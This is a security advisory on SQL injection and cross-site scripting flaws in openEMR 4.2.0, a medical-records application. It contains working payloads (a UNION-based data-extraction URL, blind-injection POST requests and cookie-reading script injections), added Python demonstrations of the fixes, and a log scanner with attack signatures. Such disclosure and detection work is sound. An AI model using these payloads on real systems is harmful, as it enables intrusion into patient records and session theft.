openEMR 4.2.0 Cross Site Scripting / SQL Injection
Posted Mar 24, 2015
Authored by Steffen Roesemann

openEMR version 4.2.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 136128c86a8cdf2ba34308166c5782a4d4d518a5c95d5d6c966b0e3831d31b38

Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in
openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list

==========================
Vulnerability Description:
==========================

Electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS
vulnerabilities.

==================
Technical Details:
==================

All below described vulnerabilities can only be exploited by an already
authenticated user.

=====================
SQL injection vulnerabilities
=====================

An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid-parameter.

Exploit-Example:

http://{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+



Another (blind) SQL injection vulnerability resides in
appt_encounter_report.php and can be abused by an attacker by modifying
the form_facility parameter in a POST request.

Exploit-Example:

POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true


The last (blind) SQL injection vulnerability resides in
appointments_report.php and can likewise be abused by an attacker by
crafting SQL statements in the form_facility parameter of a POST
request.


Exploit-Example:

POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/openemr-4.2.0/interface/reports/appointments_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true
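The three injections above share one root cause: a request parameter is spliced into the SQL text, so a value containing a quote rewrites the statement. The following is an added example, not OpenEMR's code, that reproduces the boolean-blind shape of the form_facility payload against a constructed SQLite table (substr and sqlite_version() stand in for MySQL's substring and version(); the two-column schema is an assumption) and shows the two fixes a patch applies: binding the value as a parameter, and validating it as an integer before it reaches the database.

```python
import sqlite3

# Constructed stand-in for the facility table (assumption: OpenEMR's real schema
# has many more columns; only id and name matter for the query shape shown here).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE facility (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO facility VALUES (?, ?)",
                     [(1, "Main Clinic"), (3, "Satellite Office")])
    return conn

def lookup_vulnerable(conn, form_facility):
    """Pre-patch pattern: the request parameter is pasted into the SQL text,
    so a value containing a quote changes the statement itself."""
    sql = "SELECT id, name FROM facility WHERE id = '%s'" % form_facility
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, form_facility):
    """Hardened: the value is bound as one literal; the engine never parses it."""
    return conn.execute("SELECT id, name FROM facility WHERE id = ?",
                        (form_facility,)).fetchall()

def validate_facility_id(raw):
    """Second layer: a facility id is a positive integer, so reject anything
    else before it reaches the database. Raises ValueError on the probes below."""
    value = int(raw.strip())
    if value <= 0:
        raise ValueError("facility id must be positive")
    return value

# Boolean-blind probes shaped like the advisory's form_facility payload,
# translated to SQLite functions (MySQL form: substring(version(),1,1)='5').
# SQLite's version string starts with "3", so the first probe is true.
BLIND_TRUE = "3' and substr(sqlite_version(),1,1)='3"
BLIND_FALSE = "3' and substr(sqlite_version(),1,1)='4"

if __name__ == "__main__":
    db = make_db()
    # Vulnerable path: the row comes back only when the injected condition holds,
    # which is exactly the signal a blind injection relies on.
    print("vulnerable, true probe :", lookup_vulnerable(db, BLIND_TRUE))
    print("vulnerable, false probe:", lookup_vulnerable(db, BLIND_FALSE))
    # Parameterized path: the whole string is compared as one id and matches nothing.
    print("parameterized, probe   :", lookup_parameterized(db, BLIND_TRUE))
```

The difference between the two lookups is visible in the result set, not in an error: the vulnerable query answers the probe with a row or no row depending on the server version, which is the side channel the advisory's appt_encounter_report.php and appointments_report.php requests use, while the bound query treats the entire string as a single (non-matching) id. Type validation on top of binding also gives the application a clean place to log and reject malformed ids.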


==============
XSS vulnerabilities
==============

A reflecting XSS-vulnerability can be found in user_admin.php via the
id-parameter.

Exploit-Example:

http://{TARGET}interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



A stored XSS vulnerability resides in add_edit_event.php via the
input-field "form_comments" and is executed in appointments_report.php.


Exploit-Example:

<script>alert(document.cookie)</script>
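Both XSS findings above are output-encoding failures: the id parameter lands inside an HTML attribute and form_comments lands in the report markup, in each case without escaping. The following added example (not OpenEMR's code; the markup shapes and the example.invalid host are assumptions) decodes the advisory's reflected payload the way the server sees it, renders it the vulnerable way and the escaped way, and does the same for the stored comment payload.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Payloads exactly as they appear in the advisory (the reflected one is URL-encoded).
STORED_PAYLOAD = "<script>alert(document.cookie)</script>"
REFLECTED_URL = ("http://example.invalid/interface/usergroup/user_admin.php"
                 "?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E")

def get_id_param(url):
    """Decode the id query parameter the way the server-side handler sees it."""
    return parse_qs(urlsplit(url).query)["id"][0]

def render_id_vulnerable(user_id):
    # Assumed pre-patch shape: the raw parameter is written into an attribute
    # value, so a leading double quote closes the attribute and the tag.
    return '<input type="hidden" name="id" value="%s">' % user_id

def render_id_safe(user_id):
    # quote=True also encodes " and ', which is what an attribute context needs;
    # escaping only < and > would still let the quote break out of the attribute.
    return '<input type="hidden" name="id" value="%s">' % html.escape(user_id, quote=True)

def render_comment_vulnerable(comment):
    # Assumed shape of the stored field written into appointments_report.php.
    return "<td>%s</td>" % comment

def render_comment_safe(comment):
    # Text-node context: entity-encoding the angle brackets is what neutralises it.
    return "<td>%s</td>" % html.escape(comment, quote=True)

def contains_active_content(markup):
    """Coarse check for the demo: is a live script tag still present?"""
    return "<script" in markup.lower()

if __name__ == "__main__":
    uid = get_id_param(REFLECTED_URL)
    print("decoded id     :", uid)
    print("vulnerable attr:", render_id_vulnerable(uid))
    print("escaped attr   :", render_id_safe(uid))
    print("escaped comment:", render_comment_safe(STORED_PAYLOAD))
```

The point of keeping two render functions per sink is the context: the attribute sink needs quotes encoded as well as angle brackets, while the comment sink is a text node. Applying the encoding at output time, in the page that displays the value, also covers values that were stored before the fix, which matters for the stored form_comments case.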




=========
Solution:
=========

Install the latest patch (released 21st March 2015, see [3]).
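While the patch is being rolled out, web server logs can be checked for the request shapes this advisory describes. The following added example (not part of the advisory or of OpenEMR) runs signatures derived from those shapes over constructed Apache combined-format log lines. One caveat it handles explicitly: the two report endpoints receive the injectable value in a POST body, which a standard access log does not record, so those requests are only flagged for body-level review (a WAF audit log or application-level request logging is needed to see the payload itself). The signatures and the sample lines are assumptions built from the advisory, and should be tuned against a real traffic baseline.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the request shapes in this advisory. Assumption: these
# strings are rare in legitimate OpenEMR traffic; check against your own baseline.
SIGNATURES = [
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sqli-blind", re.compile(r"\b(substring|substr)\s*\(\s*version\s*\(\s*\)", re.I)),
    ("sqli-quote-tautology", re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("xss-script-tag", re.compile(r"<\s*script\b", re.I)),
]

# The report scripts take form_facility in a POST body, which the access log
# does not contain; matched by suffix so an install prefix such as /openemr-4.2.0 works.
REPORT_POST_PATHS = (
    "/interface/reports/appt_encounter_report.php",
    "/interface/reports/appointments_report.php",
)

# Apache/nginx combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(decoded_text):
    """Return the signature names matching an already URL-decoded query or body."""
    return [name for name, rx in SIGNATURES if rx.search(decoded_text)]

def scan_access_log(lines):
    """Yield one hit per suspicious line: who, when, which script, and why."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        tags = classify_request(unquote_plus(query))
        if m["method"] == "POST" and path.endswith(REPORT_POST_PATHS) and not tags:
            tags = ["post-body-not-logged"]
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": path, "tags": tags})
    return hits

# Constructed sample lines: one benign request, then requests shaped like the
# advisory's facility_admin.php, user_admin.php and report examples.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2015:10:01:02 +0100] "GET /interface/usergroup/facility_admin.php?fid=3 HTTP/1.1" 200 5120
10.0.0.9 - - [24/Mar/2015:10:01:07 +0100] "GET /interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3 HTTP/1.1" 200 6133
10.0.0.9 - - [24/Mar/2015:10:02:11 +0100] "GET /interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 2210
10.0.0.9 - - [24/Mar/2015:10:03:00 +0100] "POST /interface/reports/appt_encounter_report.php HTTP/1.1" 200 9000
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print("%(ts)s %(ip)s %(path)s -> %(tags)s" % hit)
```

Decoding the query with unquote_plus before matching matters: the advisory's payloads arrive with spaces as `+` and quotes as `%27`, so signatures applied to the raw request line would miss them. The classify_request function takes decoded text, so the same signatures can be pointed at POST bodies from an audit log.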


====================
Disclosure Timeline:
====================

12/13-Jan-2015 - found the vulnerabilities
13-Jan-2015 - informed the developers
13-Jan-2015 - release date of this security advisory [without technical details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provides fix for testing purposes
20-Jan-2015 - agreement to release technical details when patch has been released
21-Mar-2015 - release date of the patch
22-Mar-2015 - release date of this security advisory
22-Mar-2015 - sent to Full Disclosure



========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html
[3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches

